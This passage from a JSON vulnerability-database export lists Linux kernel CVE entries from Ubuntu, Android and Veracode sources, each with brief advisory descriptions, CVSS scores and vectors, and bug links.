3.6}, "published": "2017-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2017-09-25T00:00:00", "id": "UB:CVE-2015-5327", "href": "https://ubuntu.com/security/CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T14:07:49", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6\nallows local users to cause a denial of service (BUG) or possibly have\nunspecified other impact via crafted use of the mmap and bpf system calls.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1581871>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, 
maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2016-05-23T00:00:00", "id": "UB:CVE-2016-4794", "href": "https://ubuntu.com/security/CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:14:53", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in\nthe B.A.T.M.A.N. 
implementation in the Linux kernel through 3.18.1 uses an\nincorrect length field during a calculation of an amount of memory, which\nallows remote attackers to cause a denial of service (mesh-node system\ncrash) via fragmented packets.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774155>\n * <https://launchpad.net/bugs/1407952>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2015-01-02T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2015-01-02T00:00:00", "id": "UB:CVE-2014-9428", "href": "https://ubuntu.com/security/CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:15:21", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux\nkernel through 3.18 uses an improper paravirt_enabled setting for KVM guest\nkernels, which makes it easier for guest OS users to bypass the ASLR\nprotection mechanism via a crafted application that reads a 16-bit value.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1400314>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, 
goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-8134", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2014-12-08T00:00:00", "id": "UB:CVE-2014-8134", "href": "https://ubuntu.com/security/CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T13:52:50", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel\nbefore 4.14.3 allow local users to cause a denial of service (BUG) by\nleveraging a race condition with __dm_destroy during creation and removal\nof DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", 
"baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-18203", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-02-27T00:00:00", "id": "UB:CVE-2017-18203", "href": "https://ubuntu.com/security/CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T13:55:46", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key\nManagement subcomponent in the Linux kernel before 4.13.5 does not properly\nconsider that a key may be possessed but negatively instantiated, which\nallows local users to cause a denial of service (OOPS and system crash) via\na crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-11T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12192", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2017-10-11T00:00:00", "id": "UB:CVE-2017-12192", "href": "https://ubuntu.com/security/CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T13:50:05", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in\nthe Linux kernel before 4.14.8 doesn't properly validate the\nsigevent->sigev_notify field, which leads to out-of-bounds access in the\nshow_timer function (called when /proc/$PID/timers is read). This allows\nuserspace applications to read arbitrary kernel memory (on a kernel built\nwith CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T00:00:00", "type": "ubuntucve", "title": "CVE-2017-18344", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2018-07-26T00:00:00", "id": "UB:CVE-2017-18344", "href": "https://ubuntu.com/security/CVE-2017-18344", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T14:12:55", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel\nbefore 4.0.6 do not properly consider yielding a processor, which allows\nremote attackers to cause a denial of service (system hang) via incorrect\nchecksums within a UDP packet flood.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1472160>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5364", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2015-07-02T00:00:00", "id": "UB:CVE-2015-5364", "href": "https://ubuntu.com/security/CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:09:54", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows\nlocal users to gain privileges by triggering access to a paging structure\nby a different CPU.\n\n#### Bugs\n\n * 
<https://launchpad.net/bugs/1538429>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-26T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2069", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2016-01-26T00:00:00", "id": "UB:CVE-2016-2069", "href": "https://ubuntu.com/security/CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T14:10:17", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does\nnot properly identify error conditions, which allows remote attackers to\nexecute arbitrary code or cause a denial of service (use-after-free) via\ncrafted packets.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1545029>\n\n\n#### Notes\n\nAuthor| Note \n---|--- 
\n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-31T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2015-12-31T00:00:00", "id": "UB:CVE-2015-8812", "href": "https://ubuntu.com/security/CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:10:02", "description": "The join_session_keyring function in security/keys/process_keys.c in the\nLinux kernel before 4.4.1 mishandles object references in a certain error\ncase, which allows local users to gain privileges or cause a denial of\nservice (integer overflow and use-after-free) via crafted keyctl commands.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1534887>\n\n\n#### Notes\n\nAuthor| Note \n---|--- 
\n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-01-19T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0728", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-19T00:00:00", "id": "UB:CVE-2016-0728", "href": "https://ubuntu.com/security/CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:16:18", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function\nin drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux\nkernel through 3.16.3 allow physically proximate attackers to cause a\ndenial of service (system crash) or possibly execute arbitrary code via a\ncrafted device that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with an event.\n\n#### Bugs\n\n * 
<https://launchpad.net/bugs/1370025>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-09-28T00:00:00", "type": "ubuntucve", "title": "CVE-2014-3181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2014-09-28T00:00:00", "id": "UB:CVE-2014-3181", "href": "https://ubuntu.com/security/CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:18:57", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c\nin the Linux kernel before 3.13.4 allows local users to cause a denial of\nservice (system crash) by leveraging the CAP_MAC_ADMIN capability to set a\nzero-length security context.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-1874>\n * <https://launchpad.net/bugs/1279985>\n", "cvss3": {}, "published": "2014-02-07T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1874", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2014-02-07T00:00:00", "id": "UB:CVE-2014-1874", "href": "https://ubuntu.com/security/CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:20:13", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is\nenabled, does not properly initialize certain data structures, which allows\nlocal users to cause a denial of service (memory corruption and system\ncrash) or possibly gain privileges via a crafted application that uses the\nUDP_CORK option in a setsockopt system call and sends both short and long\npackets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c\nand the ip6_ufo_append_data function in net/ipv6/ip6_output.c.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4470>\n * <https://launchpad.net/bugs/1248703>\n", "cvss3": {}, "published": "2013-11-04T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2013-11-04T00:00:00", "id": "UB:CVE-2013-4470", "href": "https://ubuntu.com/security/CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2023-06-01T14:18:27", "description": "Use-after-free vulnerability in the skb_segment function in\nnet/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to\nobtain sensitive information from kernel memory by leveraging the absence\nof a certain orphaning operation.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1298119>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 13.10 preview kernels \n[apw](<https://launchpad.net/~apw>) | Also needs the following: a5c39b046fdf5025ab4d274edaf5d8f53326b34c skbuff: skb_segment: s/fskb/list_skb/ cff87de1c2625eadcd1b38f14d3a036e160aefa3 skbuff: skb_segment: s/skb/head_skb/ ef92873b71a1879a19d64575725a7bbf8c59d9f6 skbuff: skb_segment: s/skb_frag/frag/ c4d421e6e53be12b422b5d6ff93bf6c1d6cc83d5 skbuff: skb_segment: s/frag/nskb_frag/\n", "cvss3": {}, "published": "2014-03-24T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0131", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-03-24T00:00:00", "id": "UB:CVE-2014-0131", "href": "https://ubuntu.com/security/CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}], "android": [{"lastseen": "2021-07-28T14:34:31", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified 
other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "android", "title": "CVE-2016-4794", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2019-07-29T00:00:00", "id": "ANDROID:CVE-2016-4794", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-4794.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:35", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": 
"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-01T00:00:00", "type": "android", "title": "CVE-2016-0728", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2019-07-29T00:00:00", "id": "ANDROID:CVE-2016-0728", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0728.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T13:07:37", "description": "kernel is vulnerable to denial of service. 
It does not prevent an attacker from sending malicious IPv4 packets to a misconfigured interface through the `nf_nat_redirect_ipv4` function in `net/netfilter/nf_nat_redirect.c`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-01T10:48:16", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8787"], "modified": "2023-01-19T17:42:13", "id": "VERACODE:13575", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13575/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T14:25:32", "description": "kernel is vulnerable to information disclosure. It was found that the espfix 